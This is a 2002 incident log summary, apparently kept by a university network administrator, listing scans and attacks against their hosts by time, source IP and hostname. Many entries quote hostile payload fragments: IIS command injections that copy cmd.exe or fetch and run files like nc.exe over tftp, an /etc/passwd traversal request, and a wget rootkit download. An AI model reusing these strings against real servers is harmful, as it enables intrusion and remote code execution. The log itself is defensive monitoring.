Short summary of some of the attacks against us for Jul. 2002

time EASTERN  source_ip[:port]  (dns name, if any)  attack/scan/notes

2002/07/01-00:06:00.92 61.177.251.125 (CHINANET jiangsu province network) 1. attack IIS servers thru 2002/07/01-04:53:40.90 w/command
2002/07/01-00:06:00.92 61.177.251.125 (CHINANET jiangsu province network) 2. tftp%20-i%20132.235.32.101%20GET%20cool.dll%20e:\httpodbc.dll
2002/07/01-09:05:19.24 213.224.83.118 (nchass03.telenet-ops.be) IIS attack 1. copy+\winnt\system32\cmd.exe+cmd1.exe
2002/07/01-09:05:19.24 213.224.83.118 (nchass03.telenet-ops.be) IIS attack 2. cmd1.exe?/c+echo+get+ServUDaemon.ini+>>TFTP1000_
2002/07/01-13:12:32.90 129.237.97.94 (University of Kansas,KA,US) IIS attack cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\kill.exe
2002/07/01-13:56:26.45 152.31.160.9 (www.weldoncityschools.k12.nc.us) portscan net for port 80
2002/07/01-14:12:13.00 63.136.112.69 (63-136-112-69.ADSL.CandW.ky) portscan net for port 80
2002/07/01-14:39:29.34 217.128.72.203 (AFontenayssB-103-1-1-203.abo.wanadoo.fr) scan net for port 21
2002/07/01-14:47:43.05 217.128.72.203 (AFontenayssB-103-1-1-203.abo.wanadoo.fr) portscan net for port 21
2002/07/01-14:57:53.83 132.248.200.38 (Universidad Nacional Autonoma de Mexico,MX) IIS attack tftp%20-i%20132.248.200.38
2002/07/01-15:14:20.63 213.51.120.15 (cc41746-a.sneek1.fr.nl.home.com) IIS attack tftp.exe+"-i"+213.51.120.15+get+WINMGNT.EXE+c:\WINMGNT.EXE
2002/07/01-17:15:48.24 24.112.151.202 (CPE525400db6e4f.cpe.net.cable.rogers.com) IIS attack tftp.exe%20-i%2024.112.151.202%20GET%20jrun.exe
2002/07/01-18:16:51.04 217.128.200.164 (AAnnecy-101-1-3-164.abo.wanadoo.fr) portscan net for port 21
2002/07/01-18:28:42.29 63.225.190.28 (NuWest Group, Inc.,WA,US) pound on servers on ports 139 445 137
2002/07/01-18:36:51.10 63.225.190.28 (NuWest Group, Inc.,WA,US) portscan net for port 445 139
2002/07/02-00:52:01.55 193.219.33.174 (dsp11.dsplab.ktu.lt) scan net for port 1524
2002/07/02-00:52:06.10 193.219.33.174 (dsp11.dsplab.ktu.lt) portscan net for port 1524
2002/07/02-03:02:08.41 207.35.71.175 (Metropolitain Media Corp.) portscan net for port 80
2002/07/02-03:24:53.22 61.177.254.186 (CHINANET jiangsu province network) IIS attack tftp%20-i%20132.235.80.92%20GET%20cool.dll%20d:\httpodbc.dll
2002/07/02-08:24:45.89 141.76.1.121 (proxy1.anon-online.org) IIS attack - copy+c:\winnt\system32\cmd.exe+superlol.exe
2002/07/02-08:32:01.69 217.225.164.124 (pD9E1A47C.dip.t-dialin.net) IIS attack - copy+c:\winnt\system32\cmd.exe+c:\xxx.exe
2002/07/02-08:32:01.69 217.225.164.124 (pD9E1A47C.dip.t-dialin.net) IIS attack - tftp.exe?+-i+217.225.164.124+get+c:\a.exe+c:\a.exe
2002/07/02-09:07:17.79 65.94.161.146 (MTL-HSE-ppp184858.qc.sympatico.ca) ping scan of net w/all zeros
2002/07/02-09:09:05.03 65.94.161.146 (MTL-HSE-ppp184858.qc.sympatico.ca) portscan net for port 1433
2002/07/02-11:05:27.09 24.234.133.13 (cm013.133.234.24.lvcm.com) scan net for port 445
2002/07/02-12:53:43.04 65.101.243.110 (Berland Real Estate,CO,US) portscan net on port 80
2002/07/02-12:57:20.54 65.101.243.105 (Berland Real Estate,CO,US) portscan net on port 80
2002/07/02-17:52:46.53 132.235.177.208 (dhcp-177-208.west-green.ohiou.edu) bang on topdog ports 524,445,139
2002/07/03-04:35:24.06 149.156.28.99 (Academic Computer Centre ul. Nawojki 11,PL) portscan net on port 80
2002/07/03-09:28:05.71 148.245.149.31 () scan net for port 80
2002/07/03-09:50:11.38 134.208.27.62 () scan net for port 80
2002/07/03-11:34:04.40 134.208.27.62 (cssun2.csie.ndhu.edu.tw) sadmind worm access
2002/07/03-14:37:39.13 205.221.194.241 () scan net for port 80
2002/07/03-16:03:41.02 63.171.10.246 () scan net for port 1433
2002/07/03-17:19:31.42 217.128.32.75 () scan net for port 21
2002/07/03-22:56:11.12 61.33.168.156 () scan net for port 21
2002/07/04-00:48:51.18 63.136.112.144 () scan net for port 1080
2002/07/04-01:15:11.32 129.174.41.126 () scan net for port 80
2002/07/04-02:20:38.56 61.177.247.32 () scan net for port 80
2002/07/04-02:37:29.25 61.177.244.7 () scan net for port 80
2002/07/04-04:38:00.01 61.177.246.56 () scan net for port 80
2002/07/04-04:59:32.06 61.177.247.167 () scan net for port 80
2002/07/04-06:01:29.19 24.234.133.13 (cm013.133.234.24.lvcm.com) ping scan of net, SNMP public access udp of net
2002/07/04-06:02:08.80 24.234.133.13 (cm013.133.234.24.lvcm.com) 1. IIS server attacks such as
2002/07/04-06:02:08.80 24.234.133.13 (cm013.133.234.24.lvcm.com) 2. GET /cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
2002/07/04-06:02:08.80 24.234.133.13 (cm013.133.234.24.lvcm.com) 3. portscan server on high number ports
2002/07/04-06:02:08.80 24.234.133.13 (cm013.133.234.24.lvcm.com) 4. heavy scan on ports 443,445,135,139,1025,8000,8080,161
2002/07/04-06:12:19.02 24.234.133.13 () scan net for port 1429
2002/07/04-12:03:00.27 24.234.133.13 (cm013.133.234.24.lvcm.com) back for more attacks
2002/07/04-14:37:06.58 65.214.36.153 () scan net for port 80
2002/07/04-14:52:36.45 65.214.36.156 () scan net for port 80
2002/07/04-15:12:27.07 24.234.133.13 (cm013.133.234.24.lvcm.com) 1. attack new IIS server - portscan it 1-10000+more,
2002/07/04-15:12:27.07 24.234.133.13 (cm013.133.234.24.lvcm.com) 2. scan microsoft ports, hit IIS buffer overflows
2002/07/04-16:29:28.60 24.234.133.13 (cm013.133.234.24.lvcm.com) ftp attacks with root userid, dumb passwords
2002/07/04-17:20:20.80 137.122.50.52 (University of Ottawa,CA) IIS attack w/ tftp.exe+"-i"+137.122.50.52+get+WINMGNT.EXE+c:\WINMGNT.EXE
2002/07/04-18:00:33.40 61.144.142.14 () scan net for port 80 3128 8080
2002/07/04-22:34:44.10 24.234.133.13 (cm013.133.234.24.lvcm.com) back for more portscanning, etc
2002/07/05-00:03:17.28 80.14.35.229 () scan net for port 21
2002/07/05-00:42:22.13 131.191.38.196 () scan net for port 80
2002/07/05-01:21:49.29 24.226.206.241 () scan net for port 80
2002/07/05-01:55:59.27 12.8.193.7 () scan net for port 80
2002/07/05-03:46:50.12 213.194.65.81 () scan net for port 1433
2002/07/05-05:03:20.01 61.177.246.196 () scan net for port 80
2002/07/05-06:57:19.07 213.23.20.62 () scan net for port 80
2002/07/05-07:22:41.44 80.200.102.58 () scan net for port 21
2002/07/05-08:56:11.64 132.248.225.121 (Universidad Nacional Autonoma de Mexico,MX) IIS attacks
2002/07/05-11:04:01.67 216.148.128.17 (Lexitrans, Inc.,KS,US) IIS attacks
2002/07/05-13:34:44.12 67.227.10.192 () scan net for port 25
2002/07/05-16:13:03.21 137.113.114.5 () scan net for port 80
2002/07/05-18:50:23.79 64.225.197.24 () scan net for port 445
2002/07/05-19:00:15.85 138.88.46.235 () scan net for port 1214
2002/07/05-19:46:47.14 61.177.254.209 () scan net for port 80
2002/07/05-20:02:30.43 61.177.253.144 () scan net for port 80
2002/07/05-20:17:46.27 61.177.254.33 () scan net for port 80
2002/07/05-20:21:51.17 61.177.254.33 (CHINANET jiangsu province network) 1. IIS attacks - cmds
2002/07/05-20:21:51.17 61.177.254.33 (CHINANET jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20cool.dll%20e:\httpodbc.dll
2002/07/05-21:44:22.19 61.177.247.30 () scan net for port 80
2002/07/06-05:13:03.33 62.190.169.179 (usergb179.dsl.pipex.com) ping scan of net
2002/07/06-05:17:12.85 62.190.169.179 () scan net for port 1433
2002/07/06-05:24:32.65 171.64.28.66 () scan net for port 139 445
2002/07/06-05:59:44.13 203.85.31.35 () scan net for port 111
2002/07/06-07:13:18.16 128.121.239.253 () scan net for port 80
2002/07/06-09:38:36.57 212.195.19.1 () scan net for port 21 139 1433 80
2002/07/06-10:21:51.06 217.74.161.53 (fga.krsn.ru) scan net for port 6112, buffer overflow attack
2002/07/06-10:22:00.74 217.74.161.53 (fga.krsn.ru) scan net for port 6112, buffer overflow attack (CDE dtspcd)
2002/07/06-10:22:15.36 217.74.161.53 () scan net for port 1524 6112
2002/07/06-12:41:13.12 171.64.28.66 () scan net for port 445 139
2002/07/06-19:09:05.63 172.182.7.208 () scan net for port 21
2002/07/06-20:43:52.35 61.248.209.239 () scan net for port 111
2002/07/06-20:43:59.15 61.248.209.239 () scan net for port 111
2002/07/06-21:49:46.47 217.136.34.134 () scan net for port 21
2002/07/07-00:52:56.98 211.20.23.69 () scan net for port 1433
2002/07/07-09:41:14.82 195.195.164.106 () scan net for port 1433
2002/07/07-12:12:28.95 213.0.71.154 () scan net for port 80
2002/07/07-13:03:31.24 128.248.80.67 () scan net for port 1433
2002/07/07-13:18:12.10 65.200.71.25 () scan net for port 445
2002/07/07-13:48:09.10 68.2.76.239 () scan net for port 1519
2002/07/07-13:49:33.63 128.248.80.67 (i080.oba.uic.edu) attack db server logging in as root, random passwds
2002/07/07-14:24:46.62 12.26.124.10 (alice.sunlitsurf.com) IIS attack - tftp+-i+213.51.1.133+GET+nc.exe+c:\\inetpub\\scripts\\nc.exe
2002/07/07-15:00:54.04 172.181.51.35 () scan net for port 21
2002/07/07-16:32:18.99 132.236.172.109 () scan net for port 80
2002/07/07-17:29:30.22 216.190.255.195 () scan net for port 25
2002/07/07-17:40:29.57 216.102.133.82 () scan net for port 80
2002/07/07-18:18:01.44 213.46.95.207 () scan net for port 21
2002/07/07-18:29:38.25 195.188.14.230 () scan net for port 80
2002/07/08-00:00:01.95 68.39.7.45 () scan net for port 21 22
2002/07/08-02:44:51.94 65.70.144.212 () scan net for port 139
2002/07/08-03:16:55.88 68.2.96.27 (ip68-2-96-27.ph.ph.cox.net) attack multiple WIN machines, set up ftp servers, IRC relays.
2002/07/08-03:50:35.33 61.179.119.208 () scan net for port 515
2002/07/08-03:51:56.83 203.69.237.32 (Tourism Bureau Ministry of Transportation and Communications,TW) IIS attacks
2002/07/08-06:45:57.25 65.29.179.39 () scan net for port 21
2002/07/08-06:46:03.24 65.29.179.39 (mke-65-29-179-39.wi.rr.com) scan net for port 21
2002/07/08-06:46:28.04 65.29.179.39 () scan net for port 21
2002/07/08-09:06:36.46 24.118.253.132 (c-24-118-253-132.mn.client2.attbi.com) try to conn to 132.235.1.8:6346 >150 times/day
2002/07/08-09:53:41.42 195.75.151.151:21 (Network of BCRS by IBM ITALIA,IT) scan net for port 21
2002/07/08-09:54:31.82 212.194.174.19 (lns08a-7-19.w.club-internet.fr) scan net for port 21, anon ftp attacks
2002/07/08-10:35:56.40 132.248.128.196 (Universidad Nacional Autonoma de Mexico) 1. IIS server attacks w/commands:
2002/07/08-10:35:56.40 132.248.128.196 (Universidad Nacional Autonoma de Mexico) 2. tftp%20-i%20132.248.128.196%20GET%20cool.dll%20c:\httpodbc.dll
2002/07/08-11:31:29.14 217.83.38.239 (pD95326EF.dip.t-dialin.net) attack 1 IIS server +copy+c:\winnt\system32\cmd.exe+superlol.exe
2002/07/08-14:16:28.04 62.229.70.219 () scan net for port 80
2002/07/08-16:21:56.90 217.128.148.234 (ANice-104-1-1-234.abo.wanadoo.fr) scan net for port 21
2002/07/08-16:34:03.92 217.231.154.23 (pD9E79A17.dip.t-dialin.net) IIS attack copy+c:\winnt\system32\cmd.exe+C:\inetpub\scripts\log.exe
2002/07/08-17:47:23.75 61.152.210.190 (Shanghai DigitalCom Information Industry Co.,CN) scan net for port 21
2002/07/08-19:13:37.59 195.242.51.88 () scan net for port 80
2002/07/08-21:37:04.26 80.63.241.194 (0x503ff1c2.albnxx11.adsl-dhcp.tele.dk) scan net for port 80
2002/07/09-02:24:03.24 68.63.204.144 (pcp01304431pcs.pimaco01.az.comcast.net) scan net for port 445
2002/07/09-06:32:32.03 129.186.205.67 () scan net for port 22
2002/07/09-15:53:37.25 12.101.211.126 (126.mudb.detr.sfldmibv.dsl.att.net) scan net for port 21
2002/07/09-15:53:37.33 12.101.211.126 (126.mudb.detr.sfldmibv.dsl.att.net) scan net for port 21
2002/07/09-17:16:56.01 217.74.161.53 (fga.krsn.ru) scan net for port 6112, buffer overflow attacks CDE dtspcd
2002/07/10-04:35:43.43 195.116.217.41:22 (edukacja.lo.pl) scan net for port 22,21
2002/07/10-04:35:52.37 195.116.217.41 (edukacja.lo.pl) scan net for port 22
2002/07/10-06:15:08.62 193.251.24.113 (ALimoges-101-1-1-113.abo.wanadoo.fr) scan net for port 21, anon ftp attacks
2002/07/10-06:15:28.06 193.251.24.113 (ALimoges-101-1-1-113.abo.wanadoo.fr) scan net for port 21
2002/07/10-07:40:42.78 172.177.255.238 (ACB1FFEE.ipt.aol.com) scan net for port 21
2002/07/10-08:40:50.17 65.186.163.29 (dsl-65-186-163-29.telocity.com) scan net for port 139
2002/07/10-09:34:19.37 218.233.206.48 (korea crap) scan net for port 1433
2002/07/10-11:50:25.05 216.190.255.195 (Wasatch Hosting ,UT,US) scan net for port 25
2002/07/10-13:14:44.19 172.186.179.142 (ACBAB38E.ipt.aol.com) scan net for port 21, anon ftp attacks
2002/07/10-13:20:26.08 211.66.88.8 (gdaib.edu.cn) scan net for port 111 21
2002/07/10-14:09:54.33 80.15.69.232 (ABrest-103-1-4-232.abo.wanadoo.fr) scan net for port 21
2002/07/10-15:01:37.02 172.178.3.237 (ACB203ED.ipt.aol.com) scan net for port 21
2002/07/10-15:21:42.08 61.194.193.192 (SAFe Inc.,JP) scan net for port 6112, buffer overflow attack CDE dtspcd
2002/07/10-16:35:32.05 128.32.239.104 (conan.EECS.Berkeley.EDU) scan net for port 21
2002/07/10-17:33:05.57 213.99.84.217 (213-99-84-217.uc.nombres.ttd.es) anon ftp dummy passwd file from ace
2002/07/10-17:39:46.49 158.121.125.35 (wspowerpcl.stu-life.umb.edu) scan net for port 80
2002/07/10-17:47:46.78 132.239.84.198 (evileye.ucsd.edu) try to use 132.235.1.52 as DNS server.
2002/07/10-18:40:00.00 172.186.241.34 (ACBAF122.ipt.aol.com) scan net for port 21
2002/07/10-19:25:42.03 212.199.236.233 (Golden Lines,IL) IIS attack tftp.exe+"-i"+212.199.236.233+get+TLIST.EXE
2002/07/10-22:01:56.34 200.30.47.70 (Eccel S.A,QUINDIO.CL) 1. IIS attack copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
2002/07/10-22:01:56.34 200.30.47.70 (Eccel S.A,QUINDIO.CL) 2. ftp to badtown.dynu.com usr/pass server/leech, get Serv-U ftp daemon.
2002/07/10-22:01:56.34 200.30.47.70 (Eccel S.A,QUINDIO.CL) 3. install in c:\recycler\bin\a
2002/07/10-23:35:42.30 217.209.74.93 (h93n2fls33o899.telia.com) portscan 132.235.1.36 on 80,110,22,25,6000,23,22
2002/07/10-23:47:58.88 217.209.74.93 (h93n2fls33o899.telia.com) try to login to 132.235.1.36 as phikz
2002/07/11-07:40:59.75 24.60.226.113 (h002078cc84f1.ne.client2.attbi.com) try all day to connect to 132.235.1.252:2025 - why?
2002/07/11-15:10:38.55 216.9.67.18 (orf-sdsl-lan-216-9-67-18.pinn.net) scan net for port 80
2002/07/11-16:34:35.00 132.235.198.68 (dhcp-198-068.cns.ohiou.edu) portscan 132.235.17.1
2002/07/11-17:03:09.07 217.1.118.178 (pD90176B2.dip.t-dialin.net) conn to 132.235.1.54:500 UDP and 132.235.1.54:80
2002/07/11-17:53:51.39 203.69.237.32 (Tourism Bureau Ministry of Transportation and Communications,TW) 1. IIS attacks w/command
2002/07/11-17:53:51.39 203.69.237.32 (Tourism Bureau Ministry of Transportation and Communications,TW) 2. tftp%20-i%20132.32.7.238%20GET%20cool.dll
2002/07/11-19:28:33.03 217.225.241.67 (pD9E1F143.dip.t-dialin.net) scan net for port 80
2002/07/11-19:35:17.78 195.232.55.5:21 (fra-tgn-oyw-vty5.as.wcom.net) scan net for port 21
2002/07/11-20:13:14.64 195.232.55.3:21 (fra-tgn-oyw-vty3.as.wcom.net) scan net for port 21
2002/07/11-20:23:24.10 195.232.55.3 (fra-tgn-oyw-vty3.as.wcom.net) 1. snmpXdmi, dtspcd buffer overflow attacks, port 111 scans
2002/07/11-20:23:24.10 195.232.55.3 (fra-tgn-oyw-vty3.as.wcom.net) 2. break into sun machine, ftp to 62.211.66.16 w/ user/pass
2002/07/11-20:23:24.10 195.232.55.3 (fra-tgn-oyw-vty3.as.wcom.net) 3. fasciofascio/cicciociccio to get wget. Use wget to get rootkit
2002/07/11-20:23:24.10 195.232.55.3 (fra-tgn-oyw-vty3.as.wcom.net) 4. from http://62.211.66.55/fasciofascio/sun.tar
2002/07/11-20:54:22.22 213.22.214.112 (a213-22-214-112.netcabo.pt) scan net for port 80
2002/07/11-21:39:09.73 200.30.47.70 () attack IIS server w/ copy+c:\winnt\system32\cmd.exe+c:\inetpub\s
2002/07/11-23:04:03.56 210.77.137.162 () attack IIS server w/ tftp%20-i%20132.147.160.61%20GET%20cool.dll
2002/07/12-00:32:43.83 203.69.216.75 (East Jean Ltd.Taiwan Branch (Hong Kong),Taipei,TW) scan net for port 1433
2002/07/12-00:34:13.12 203.69.216.75 (East Jean Ltd.Taiwan Branch ,TW) scan net for port 1433
2002/07/12-00:42:41.37 68.61.169.14 (pcp01120877pcs.flshng01.mi.comcast.net) IIS attack - tftp.exe+"-i"+24.157.158.23+get+WINMGNT.EXE
2002/07/12-00:43:28.75 68.61.169.14 (pcp01120877pcs.flshng01.mi.comcast.net) IIS attack - tftp.exe+"-i"+68.61.169.14+get+WINMGNT.EXE
2002/07/12-03:56:45.57 165.139.183.1 (Indiana Higher Education Telecommunication System ,IN,US) scan net for port 80
2002/07/12-03:59:14.18 211.216.52.194 (korea crap) scan net for port 22
2002/07/12-05:45:44.10 211.190.103.8 (Onse Telecom,KYONGGI,KR) scan net for port 1433
2002/07/12-06:04:32.22 216.136.225.11:5050 (cs16.msg.sc5.yahoo.com) probe port 42890 on p1, 1 packet every 10 mins.
2002/07/12-07:43:06.31 200.237.121.78 () scan net for port 139
2002/07/12-10:28:00.14 80.136.213.29 () scan net for port 80
2002/07/12-10:32:55.20 62.190.169.179 (usergb179.dsl.pipex.com) scan net for port 1433
2002/07/12-10:32:55.68 62.190.169.179 (usergb179.dsl.pipex.com) ping scan of net
2002/07/12-10:35:14.03 62.190.169.179 () scan net for port 1433
2002/07/12-14:05:30.03 217.136.118.64 () scan net for port 21
2002/07/12-14:36:22.00 80.133.73.233 (p508549E9.dip.t-dialin.net) scan net for port 80
2002/07/12-14:36:55.22 80.133.73.233 () scan net for port 80
2002/07/12-14:37:16.72 80.133.73.233 (p508549E9.dip.t-dialin.net) cmd.exe access on IIS thru 15:48:21.67 >2500 times
2002/07/12-15:51:39.32 68.81.139.125 (pcp01328366pcs.chrstn01.pa.comcast.net) 1. scan net for port 445, 80, probe select ips heavily
2002/07/12-15:51:39.32 68.81.139.125 (pcp01328366pcs.chrstn01.pa.comcast.net) 2. SMB attacks
2002/07/12-16:03:17.07 68.81.139.125 () scan net for port 445 80
2002/07/12-19:09:35.54 80.13.125.209 (AReims-105-1-3-209.abo.wanadoo.fr) scan net for port 21
2002/07/12-19:17:38.24 80.13.125.209 () scan net for port 21
2002/07/12-21:05:19.56 80.132.50.141 () scan net for port 80
2002/07/13-02:03:50.74 193.131.87.203 () scan net for port 139
2002/07/13-03:44:04.07 217.136.118.64 (adsl-63040.turboline.skynet.be) scan net for port 21, anon ftp attacks
2002/07/13-06:02:32.45 212.43.243.137 (137.rev.seckomtek.com) scan select ips for port 1024,3072
2002/07/13-06:03:09.65 216.136.225.11:5050 (cs16.msg.sc5.yahoo.com) still probe port 42890 on p1, 1 packet every 10 mins.
2002/07/13-07:07:59.26 213.56.68.99 () scan net for port 139
2002/07/13-07:13:21.17 213.56.68.99 () scan net for port 139
2002/07/13-08:41:32.73 217.128.73.176 (ARennes-303-1-3-176.abo.wanadoo.fr) ping scan of net
2002/07/13-08:41:33.66 217.128.73.176 (ARennes-303-1-3-176.abo.wanadoo.fr) scan net for port 135,139
2002/07/13-08:41:33.66 217.128.73.176 (ARennes-303-1-3-176.abo.wanadoo.fr) scan net for ports 21,23,80,445,139,137,180
2002/07/13-08:42:13.52 217.128.73.176 () scan net for port 21 23 135 139 180 80 445
2002/07/13-12:12:40.46 198.163.214.100 () scan net for port 3128 23 8080 6588 80 1080
2002/07/13-17:11:30.08 80.13.200.110 () scan net for port 21
2002/07/13-17:21:06.92 217.224.229.168 (pD9E0E5A8.dip.t-dialin.net) 1. attack IIS server, start ftp server w/command:
2002/07/13-17:21:06.92 217.224.229.168 (pD9E0E5A8.dip.t-dialin.net) 2. c:\WINNT\system32\ras\.temp\.data\.user\.files\.stuff\svchost.exe
2002/07/14-00:10:36.27 217.85.136.249 () scan net for port 80
2002/07/14-01:42:02.31 63.136.112.247 (63-136-112-247.ADSL.CandW.ky) probe select ips on port 21
2002/07/14-01:42:22.11 63.136.112.247 () scan net for port 21
2002/07/14-04:47:05.71 24.192.152.243 (CPE00d009db9455-CM00803785d223.cpe.net.cable.rogers.com) attack IIS server tftp.exe+"-i"+24.192.152.243+get+WINMGNT.EX
2002/07/14-10:14:26.63 24.208.177.204 () scan net for port 48824 39941 46169 6792 8579
2002/07/14-13:55:39.90 172.169.151.61 () scan net for port 40418 42205 43995 10845 9056
2002/07/14-14:54:09.95 200.226.136.138 (138.136.226.200.in-addr.arpa.ig.com.br) 1 packet to random high port on 3 ips.
2002/07/14-16:21:53.44 142.177.221.244 () scan net for port 80
2002/07/15-02:12:15.60 200.226.136.137 (137.136.226.200.in-addr.arpa.ig.com.br) 1 packet to random high port on 13 ips.
2002/07/15-02:13:37.53 128.146.98.56 (emptweb.mps.ohio-state.edu) scan net for port 445
2002/07/15-02:15:17.80 128.146.98.56 () scan net for port 445
2002/07/15-03:01:08.27 67.37.164.161 () scan net for port 80
2002/07/15-05:55:41.96 217.235.56.95 () scan net for port 80
2002/07/15-05:59:20.76 200.226.136.137 (137.136.226.200.in-addr.arpa.ig.com.br) 1 packet to random high port on 80 ips to 21:57:01.07
2002/07/15-11:41:58.55 212.34.196.98 (CITIES ON LINE NETWORK,IT) scan net for port 1433
2002/07/15-12:37:49.87 66.236.179.198 (XO Communications ,CA,US) scan net for port 1433
2002/07/15-13:07:35.93 212.129.55.238 (dyn-212-129-55-238.ppp.tiscali.fr) ping scan of net
2002/07/15-23:51:38.74 61.147.60.133 (CHINANET jiangsu province network) try to connect to 132.235.1.35:21
2002/07/16-20:31:00.69 66.179.34.19 (Gravity Corp,GA,US) scan net for port 1024
2002/07/17-03:36:44.70 61.147.60.68 (CHINANET jiangsu province network) try to connect to 132.235.1.35:21
2002/07/17-06:45:21.47 62.194.78.11 (node-c-4e0b.a2000.nl) scan net for port 21
2002/07/17-10:07:48.03 217.136.121.100 (adsl-63844.turboline.skynet.be) scan multiple ips for port 1433
2002/07/17-12:12:27.92 80.116.172.146 (Telecom Italia,IT) scan net for port 23
2002/07/17-17:56:55.44 64.80.200.219 (Astea Inc,PA,US) scan net for port 1433
2002/07/17-22:44:10.03 209.246.70.145 (dialup-209.246.70.145.Dial1.NewYork1.Level3.net) 1. IIS attack w/command
2002/07/17-22:44:10.03 209.246.70.145 (dialup-209.246.70.145.Dial1.NewYork1.Level3.net) 2. c+echo+get%20servudaemon. .. etc
2002/07/17-22:44:10.03 209.246.70.145 (dialup-209.246.70.145.Dial1.NewYork1.Level3.net) 3. ftp to 138.87.45.4:5078 u/p shit/shit
2002/07/17-23:18:15.17 172.186.157.63 (ACBA9D3F.ipt.aol.com) scan net for port 21
2002/07/18-05:15:13.94 216.187.66.88 (ACTADIVINA,Langley, BC ,CA) slow scan random ips, 1 packet to high number port
2002/07/18-05:47:58.72 61.147.60.220 (CHINANET jiangsu province network) try to connect to 132.235.1.35:21
2002/07/18-06:20:18.06 62.90.172.225 (adsl-172-225.barak.net.il) scan net for port 21
2002/07/18-06:29:29.21 61.36.48.58 (LG VILLAGE APT,KYONGGI,KR) scan net for port 111, buffer overflow attacks
2002/07/18-08:28:58.36 212.77.224.191 (adserver.netzpiloten.de) slow scan random ips, 1 packet to high number port
2002/07/18-09:12:15.37 62.107.157.240 (3E6B9DF0.slag.stofanet.dk) attack IIS on 132.235.18.105, mkdir c:\exchange etc..
2002/07/18-09:24:14.31 200.181.139.75 (4-075.ctame701-4.telepar.net.br) attack IIS on 132.235.18.105
2002/07/18-10:01:56.91 68.80.219.60 (pcp01361467pcs.jamisn01.pa.comcast.net) attack IIS on 132.235.18.105
2002/07/18-12:13:28.35 65.31.6.185 (dhcp065-031-006-185.insight.rr.com) probe 132.235.1.162:6346
2002/07/18-12:55:27.75 211.220.135.3 (korea crap) scan net for port 1433
2002/07/18-13:02:21.12 206.208.62.141 (CACHE1.SPACEY.NET) attack IIS on 132.235.18.105
2002/07/18-20:20:43.67 213.96.165.79 (213-96-165-79.uc.nombres.ttd.es) IIS attack
2002/07/18-20:37:21.51 67.68.128.171 (Toronto-HSE-ppp3756540.sympatico.ca) scan several ips, ports 27374 12345 139
2002/07/18-20:40:09.38 66.78.14.220 (Virtual Development INC,NJ,US) slow scan of net, 1 pkt per ip
2002/07/19-02:30:56.51 209.9.22.167 (209-9-22-167.sdsl.cais.net) scan net for port 445
2002/07/19-05:20:54.90 80.13.190.114 (ALille-102-1-3-114.abo.wanadoo.fr) scan net for port 1433
2002/07/19-05:21:22.89 80.13.190.114 (ALille-102-1-3-114.abo.wanadoo.fr) scan net for port 1433
2002/07/19-09:28:28.27 65.24.133.141 (dhcp065-024-133-141.columbus.rr.com) ping scan of net
2002/07/19-09:28:28.48 65.24.133.141 (dhcp065-024-133-141.columbus.rr.com) portscan ace, boss, deuce
2002/07/19-14:46:09.59 217.230.10.43 (pD9E60A2B.dip.t-dialin.net) FTP format string attempt (ftp://%a:%p/) on several ftp servers
2002/07/19-14:46:23.51 217.230.10.43 (pD9E60A2B.dip.t-dialin.net) scan net for port 21
2002/07/19-14:46:38.14 217.230.10.43 (pD9E60A2B.dip.t-dialin.net) ICMP superscan echo of net
2002/07/19-18:09:52.52 132.235.8.77 (juniper.cns.ohiou.edu) scan net on port 161
2002/07/20-00:14:59.02 211.102.32.3 (Capital network, LTD,BEIJING,CN) scan net for port 21
2002/07/20-14:21:00.79 66.140.58.57 (adsl-66-140-58-57.dsl.rcsntx.swbell.net) scan net for port 25
2002/07/20-14:45:42.76 80.11.219.121 (APlessis-Bouchard-106-1-1-121.abo.wanadoo.fr) scan net for port 1433
2002/07/20-15:26:08.00 61.156.9.133 (CHINANET Shandong province network) scan net for port 111, sadmind buffer overflow attacks
2002/07/20-18:15:46.90 203.69.237.32 (HINET-TW,TW) IIS attack tftp%20-i%20132.32.7.238%20GET%20cool.dll%20c:\httpodbc.dll
2002/07/20-22:13:52.91 139.81.32.154 (GLI,GA,US) portscan ace
2002/07/21-02:18:26.23 68.63.204.144 (pcp01304431pcs.pimaco01.az.comcast.net) scan net for port 445
2002/07/21-02:40:16.01 66.52.57.138 (dialup-66-52-57-138.digitalputty.com) scan net for port 1433
2002/07/21-14:28:04.66 217.235.83.99 (pD9EB5363.dip.t-dialin.net) IIS attack copy+c:\winnt\system32\ftp.exe+2.exe
2002/07/21-21:22:08.77 130.228.43.55 (Brunata,DK) scan net for port 22
2002/07/21-23:51:29.15 24.201.170.22 (modemcable022.170-201-24.mtl.mc.videotron.ca) scan net for ports 445,137,139,80
2002/07/22-03:20:54.58 24.201.170.22 (modemcable022.170-201-24.mtl.mc.videotron.ca) IIS view source via Translate header attacks
2002/07/22-12:15:34.34 65.31.6.185 (dhcp065-031-006-185.insight.rr.com) scan net for port 6346
2002/07/22-12:17:00.19 24.132.68.215 (node144d7.a2000.nl) scan net for port 1433
2002/07/22-12:44:57.38 24.201.170.22 (modemcable022.170-201-24.mtl.mc.videotron.ca) 1. scan net for ports 137,139,80,445
2002/07/22-12:44:57.38 24.201.170.22 (modemcable022.170-201-24.mtl.mc.videotron.ca) 2. pound on select ips ports 139,445
2002/07/22-15:00:14.90 80.116.241.111 (Telecom Italia,IT) scan net for port 1080
2002/07/22-17:53:10.38 193.252.110.234 (ARennes-303-1-2-234.abo.wanadoo.fr) 1. scan net for port 135,139 -
2002/07/22-17:53:10.38 193.252.110.234 (ARennes-303-1-2-234.abo.wanadoo.fr) 2. portscan 132.235.4.66 21,23,80,180,445,139
2002/07/22-18:48:49.89 24.167.240.9 (mke-24-167-240-9.wi.rr.com) ping scan of net, ports 80,445, pound on several ips port 445
2002/07/22-22:13:10.19 80.13.85.172 (APoitiers-106-1-4-172.abo.wanadoo.fr) scan net for port 1433
2002/07/22-23:12:35.36 212.199.240.251 (Golden Lines,IL) scan net for port 1433
2002/07/23-03:31:21.60 66.33.60.86 (kerney.lumtech.com) scan net for port 21
2002/07/23-06:33:48.32 172.138.3.80 (AC8A0350.ipt.aol.com) heavy scans of net for port 139
2002/07/23-06:33:57.33 172.138.3.80 (AC8A0350.ipt.aol.com) scan net for port 27374
2002/07/23-13:47:30.16 217.231.235.37 (pD9E7EB25.dip.t-dialin.net) ping scan of net, scan net for port 21
2002/07/23-15:23:11.26 212.195.67.217 (lns12m-4-217.w.club-internet.fr) scan net for port 21
2002/07/23-16:25:30.81 24.201.170.22 (modemcable022.170-201-24.mtl.mc.videotron.ca) beat on net for ports 224,80,137,139
